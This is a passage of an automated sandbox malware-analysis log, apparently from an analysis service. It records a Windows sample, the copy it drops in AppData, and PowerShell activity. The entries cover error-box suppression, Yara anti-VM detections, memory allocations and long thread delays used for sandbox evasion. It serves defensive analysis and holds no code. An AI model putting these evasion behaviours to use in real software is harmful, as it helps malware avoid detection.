Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: ZTEIhNCtP3.exe PID: 6164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HgKRLOctZksk.exe PID: 5404, type: MEMORYSTR

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: 2910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: 84E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: 94E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: 96D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: A6D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 1010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 2A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 8B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 7570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 9B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: AB20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 1700000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 33B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Memory allocated: 1A60000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598887	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598232	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598014	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595062	Jump to behavior
